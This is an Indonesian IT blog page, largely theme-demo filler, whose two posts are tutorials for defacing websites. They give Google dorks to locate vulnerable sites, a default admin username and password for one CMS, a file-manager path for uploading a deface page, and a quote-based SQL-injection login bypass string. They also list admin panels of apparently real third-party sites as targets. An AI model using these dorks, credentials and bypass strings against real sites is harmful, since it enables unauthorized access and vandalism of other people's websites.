.:: Ilmu Andi Rendy ::..

Tempat Berbagi Ilmu² Seputar IT

Design your theme

Righteous Kill

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in ...

Quisque sed felis

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in ...

Etiam augue pede, molestie eget.

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit nisl in ...

Hellgate is back

Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Quisque sed felis. Aliquam sit amet felis. Mauris semper, velit semper laoreet dictum, quam diam dictum urna, nec placerat elit ...

Post with links

This is the web2feel wordpress theme demo site. You have come here from our home page. Explore the Theme preview and inorder to RETURN to the web2feel home page CLICK ...

Latest Posts

DEFACE WEB VERSI 2

Cara Deface Web Dengan Default Password (MNET Solution)

 
1. Cari targetnya di pencarian google menggunakan dork :
inurl:webboard.php?option=answers

 2. Setelah itu, anda coba buka salah satu web yang muncul di hasil pencarian.

3. Masuk ke panel admin.
Contoh : www.site.com/siteadmin/

 Berikut adalah tampilan panel adminnya

Cara Deface Web Dengan Default Password (MNET Solution)


4. Isikan username dan password defaultnya pada kolom yang kosong
Username : superadmin
Password : jocho

 5. Setelah itu klik "login"

6. Jika berhasil, url akan berubah menjadi www.site.com/siteadmin/ControlPanel.php

 7. Setelah masuk, anda ubah url'nya dari www.site.com/siteadmin/ControlPanel.php menjadi www.site.com/editor/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?editor=form&elementId=iconnew

 Berikut adalah tampilannya

Cara Deface Web Dengan Default Password (MNET Solution)

8. Disini anda hanya bisa mengupload file html, jadi anda hanya bisa menyisipkan file deface saja, bukan upload shell. Anda upload file deface anda dengan klik tombol "upload" disebelah kiri. Nanti akan muncul sebuah pop up, anda klik "choose file" untuk memilih file html anda dan klik "upload" untuk menguploadnya.

Cara Deface Web Dengan Default Password (MNET Solution)

9. Tunggu beberapa menit hingga file terupload. Jika sudah terupload, buka file deface anda dengan format : www.site.com/images/namafile.html

 10. Taadaa... Muncullah file deface anda

Selamat mencoba ^_^

[ Read More ]

DEFACE WEB versi 1

Setelah sekian lama,web saya di deface.

sekarang baru dapat tutoryg jelasnya.

dansaya coba berhasil.... berikut tutornya...


Cara Masuk Halaman Admin Dengan Mudah

Trik DorK Nga akan Habis Kalau Teman Mau Dork Vuln
 

Untuk Masuk website yang Cms nya Rentan Dengan Php Login. User/admin nya
Ini Dorknya:

                                        

Bypass
inurl:[admin/login.php]site:com intitle:loginLogika

setelah berhasil masuk site: misal :http://sdta.co.id/dev-admin/login.php

admin/upload/notice


sesudah masuk perhatikan gambar ini


inurl:[admin/login.php]site:com intitle:login.php
inurl:[admin/login.php]site:ac.id intitle:login.php
inurl:[admin/login.php]site:net intitle:login.php
inurl:[admin/login.php]site:com intitle:login.php
inurl:[admin/login.php]site:org intitle:login.php
inurl:[admin/admin/index.php]site:in intitle:login
untuk dorn lain bisa kalian kembakan sendiri

Ini Metode Bypass

Name '=' 'or' pasword '=' 'or' 

Mungkin teman Teman Juga Bisa Lihat Letak Halaman Admin

Yang berbeda-berbeda Di site ini

http://solmeyvn.com/

http://sol1.solmeyvn.com/notesmanagement.php

http://cycade.com/

http://admin.cycade.com/

http://www.iusoft.org/

http://bssgc.iusoftbd.com/dashboard.php

http://afifwebsite.com/

http://hmsb.afifwebsite.com/product.php?name=Admin

https://www.healthtechpal.com/login.php

http://screenie.com/

https://admin.screenie.com/login.php

https://admin.screenie.com/zylun/managenew/positions
/
http://admin.01viral.com/cpt-use.php

http://www.minikraanwerkendevelder.com/pic_upload.php?
titel=%20Pictures%20=%3E%20Uploaden

http://admin.ballstep789.com/index.php

http://sdta.co.id/dev-admin/loker.php

http://sipenmaru-poltekkes-tte.ac.id/admin/index.php

http://www.bitaraf.com/admin/index.php?

http://www.parkinglotb.com/admin/index.php?region=3551

http://www.miramarinteractive.com/demo/admin/index.php
[ Read More ]